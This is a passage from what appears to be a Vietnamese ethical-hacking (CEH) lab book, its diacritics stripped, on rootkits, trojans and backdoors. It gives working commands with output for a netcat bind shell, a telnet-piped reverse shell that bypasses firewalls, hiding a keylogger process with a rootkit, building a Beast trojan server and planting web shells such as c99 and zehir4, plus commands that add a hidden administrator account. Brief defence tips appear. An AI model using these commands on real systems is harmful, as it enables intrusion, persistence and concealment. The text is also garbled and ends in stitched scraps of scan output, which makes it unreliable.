trn PC ca my nn nhn, c bit l cc thng tin nhy cm nh th tn dng, account, v.v.
Ngi vit khuyn co cc bn s dng kin thc vi mc ch nghin cu, khng s dng
chng trnh ny vi mc ch xu.
Bi Lab 5: S dng Rootkit v xa Log file
Rootkit l chng trnh lm n s hot ng ca keylogger, trojan, lm cho admin h
thng kh khn trong vic pht hin. Trong bi thc hnh ta s dng Fu Rootkit n process
ca keylogger ta ci bi trc, ta s dng lnh tasklist xem cc process chy trong
my tnh.
Trang 27
Gio trnh bi tp C|EH
Nh ta thy trn hnh, proccess ca cehkeyloger.exe c PID l 1236, by gi ta s ln

process ny bng lnh fu ph 1236 v th xem li cc process bng lnh tasklist.
Trang 28
Gio trnh bi tp C|EH
Ta thy keylogger bin mt khi tasklist, lc ny mun detect c chnh xc

ngi admin nn s dng trng trnh antivirus, kim sot truy nhp v chy nhng chng
trnh kim tra rootkit trong my nh rootkit detector.
Trang 29
Gio trnh bi tp C|EH
Bi 4:
TROJAN v BACKDOOR
I/ Gii thiu v Trojan v Backdoor:
Trojan v Backdoor c s dng gim st my nn nhn, v l ca sau Hacker c th
vo li h thng my tnh thng qua cng kt ni(port), thng qua mi trng Web(webase).
Loi s dng cng kt ni ta thng thy l netcat, beast, Donald Dick v.v. V loi s dng
mi trng Webbase thng thng l r57,c99, zehir4v.v. c tnh ca Trojan kt ni port l
mi ln kt ni phi m cng, v admin tng i pht hin d dng hn so vi loi
Webbase(thng thng tn cng Web Server). Trong bi thc hnh, chng ta ci th cc
tnh nng ca netcat, beast, c99, zehir4 v phn tch 1 don code mu trojan.
II/ Cc bi thc hnh:
Bi 1 S dng netcat:
1/S dng netcat kt ni shell
Trn my tnh ca nn nhn, bn khi ng netcat vo ch lng nghe, dng ty chn l
(listen) v -p port xc nh s hiu cng cn lng nghe, -e <tn_chng_trnh_cn_chy>
yu cu netcat thi hnh 1 chng trnh khi c 1 kt ni n, thng l shell lnh cmd.exe
(i vi NT) hoc bin/sh (i vi Unix).
E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error
- trn my tnh dng tn cng, bn ch vic dng netcat ni n my nn
nhn trn cng nh, chng hn nh 8080
C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
Copyright 1985-1999 Microsoft Corp.
E:\>cd test
cd test
E:\test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of E:\test
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
Trang 30
Gio trnh bi tp C|EH
C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK
By gi chng ta c c shell v kim soat c my nn nhn.Tuy nhin, sau kt ni
trn, netcat trn my nn nhn cngng lun. yu cu netcat lng nghe tr li sau mi kt
ni, bn dng -L thaycho -l. Lu : -L ch c th p dng cho bn Netcat for Windows, khng
p dng cho bn chy trn Linux.
2/S dng netcat kt ni shell nghch chuyn by pass Firewall:
- dng telnet ni ca s netcat ang lng nghe, k a lnh t ca s ny vo lung
telnet nghch chuyn, v gi kt qu vo ca s kia.
V d:
- trn my dng tn cng(172.16.84.1), m 2 ca s netcat ln lt lng nghe trn cng 80
v 25:
+ ca s Netcat (1)
C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
connect to [172.16.84.1] from <UNKNOWN> [172.16.84.2] 1055
pwd
ls -la
_
+ ca s Netcat (2)
C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 b (?n
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ?
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 l (?b
drwxr-xr-x 2 root root 7168 De = ? 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ?
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb (?n
Trang 31
Gio trnh bi tp C|EH
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp

drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var
- trn my tnh nn nhn(172.16.84.2), telnet nghch chuyn n my dng

tn cng(172.16.84.1), dng /bin/sh kt xut:
[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_
Telnet trn my nn nhn s chuyn tt c nhng g m chng ta g vo trong
ca s Netcat (1) - cng 80 kt xut sang cho /bin/sh thi hnh. Kt qu ca
/bin/sh c kt xut tr li cho my tnh dng tn cng trn ca s Netcat
(2) - cng 25. Nhim v ca bn l ch cn g lnh vo ca s Netcat (1) v xem
kt qu trong ca s Netcat (2).
S d ti chn cng 80 v 25 v cc cng ny thng khng b firewalls hoc
filters lc.
Bi 2: S dng Trojan Beast v detect trojan.
Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn,
sau file server ny s lng nghe nhng port c nh v t my tn cng ta s connect vo
my nn nhn thng qua cng ny.
Chn trojan Beast trong a CD v chy file to trojan.
Ta c th s dng thm cc tnh nng nh AV-FW kill t Firewall trn my i

phng, hoc inject vo 1 file khc nh notepad.exe, explore di dng dll. Ta s dng
button Save Server ti ra file server.exe v chy file my nn nhn v kim tra trn
taskmanager ca my nn nhn xem Trojan thc s hot ng.
Trang 32
Gio trnh bi tp C|EH
By gi ta s dng chng trnh ti my tn cng connect vo file Server chy

trn my ca nn nhn.
Ta th s dng 1 s tnh nng nh l managers file download cc file mnh cn ti

my nn nhn, hay bn c shutdown, reboot my nn nhn thng qua tnh nng ca tag
Windows
Trang 33
Gio trnh bi tp C|EH
Cch phng chng: Ngoi cch s dng cc chng trnh Anti Virus v Trojan, ta c th
da v tnh cht thng thng nhng Trojan ny bt buc phi m port no ra ngoi, ta c
th xem bng chng trnh Curr Port hay chng trnh fport.
Trang 34
Gio trnh bi tp C|EH
Da vo thng tin Currport cung cp ta c th xa ng dn ca file cehclass.exe v

xa nhng thng tin v n trong regedit, v startup v.v.
Bi 3: S dng Trojan di dng Webbase
Trojan dng webbase thng thng ph bin hn trong mi trng web, sau khi
hacker khai thc c l hng v chim quyn s dng Web Server, hacker s li trojan
di dng Webbase v thng qua Trojan ny hacker c th ra vo h thng cho nhng ln sau.
c im ca loi Trojan ny l rt kh pht hin, v no chy di dng Web v s dng
nhng hm truy sut h thng thng qua cc ngn ng asp, phpv.v, v vy n khng th d
pht hin nh loi trojan kt ni nh netcat, beast v.v.
thc hin bi lab ny trc tin ta phi ci t Web Server gm IIS v Apache.
1/Trojan di dng Web vi ngn ng ASP: Ta s dng Web Server IIS vi
Trojan c vit bng ngn ng ny, ngi vit gii thiu vi cc bn 2 trojan tiu biu l
cmd.asp v zehir4.asp
u tin bn ci t dch v Web IIS(vic ci t kh n gin, hc vin c th t
mnh lm phn ny), chp 2 file vo th mc www truy cp thng qua Web.
Trang 35
Gio trnh bi tp C|EH
Ta nh vo lnh Dir xem thng tin cc file trong h thng, vi trojan nh trn ta
c th xem c cc thng tin h thng, c th upload,download thng qua tftp, v add user
vo h thng v d lnh net user hao hao /add, net Localgroup administrators hao /add .
Vo link http://192.168.1.116/zehir4.asp xem v trojan webbase th 2.
Ta thy Trojan ny hng ha v tin dng hn, vic ly file,xa file hon ton
thng qua web, chng ta c th d dng thao tc trn my ca nn nhn.
2/Trojan vi ngn ng PHP: Ta s dng Web server Apache vi trojan c vit bng
ngn ng ny, ngi vit gii thiu n cc bn trojan tiu biu l c99.
u tin bn s dng chng trnh phpeasy ci kt hp 3 gi sau apache, php, v
mysql. Tuy nhin trong bi cc bn ch cn s dng php v apache. Chp cc file trojan v th
mc www c th chy c cc file ny.
Trang 36
Gio trnh bi tp C|EH
y l file trojan rt nguy him, n va c th download, upload file, ng thi h tr

chng ta chy nhng ng dng nh perl, thc thi cc hm h thng, cung cp thng tin v nn
nhn hin hnhv.v. Do tnh cht nh vy cho nn Trojan ny c hacker dng rt rng
ri(ngoi ra cn c r57, phpshellv.v).
Trang 37

CEH Lab Book Tieng Viet Phan1

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CEH Lab Book Tieng Viet Phan1

Uploaded by

Copyright:

Available Formats

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

II/ Cc bi Lab: .............................................................................................................. 74

VSIC Education Corporation

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Sau ta nhn c thng tin nh sau:

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Registrar Name....: BlueHost.Com

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Last modified: 2007-04-05 16:50:56 GMT

Vic tm kim c thng tin ny rt cn thit vi Hacker, bi v da vo thng tin s

VSIC Education Corporation

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Sau nh t kha vnn.vn vo tag keyword

Sau chng ta c c 1 list mail nh s dng trng trnh ny.

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

7/tcp open echo

VSIC Education Corporation

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Interesting ports on 10.100.100.16:

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

VSIC Education Corporation

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

OS detection performed. Please report any incorrect results at http://insecure.o

Tip tc vi nhng my cn li.

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

OS detection performed. Please report any incorrect results at http://insecure.o

VSIC Education Corporation

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Network Distance: 1 hop

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Report t chng trnh Retina:

ASN.1 Vulnerability Could Allow Code Execution

Windows Cumulative Patch 835732 Remote

No Remote Registry Access Available

Windows RPC Cumulative Patch 828741 Remote

Windows RPC DCOM interface buffer overflow

Windows RPC DCOM multiple vulnerabilities

Apache 1.3.27 0x1A Character Logging DoS

VSIC Education Corporation

Gio trnh bi tp C|EH

Ti liu dnh cho hc vin

Apache 1.3.27 HTDigest Command Execution

Apache mod_alias and mod_rewrite Buffer Overflow

ApacheBench multiple buffer overflows

HTTP TRACE method supported

TOP 20 OPEN PORTS

Port Number Description

QOTD - Quote of the Day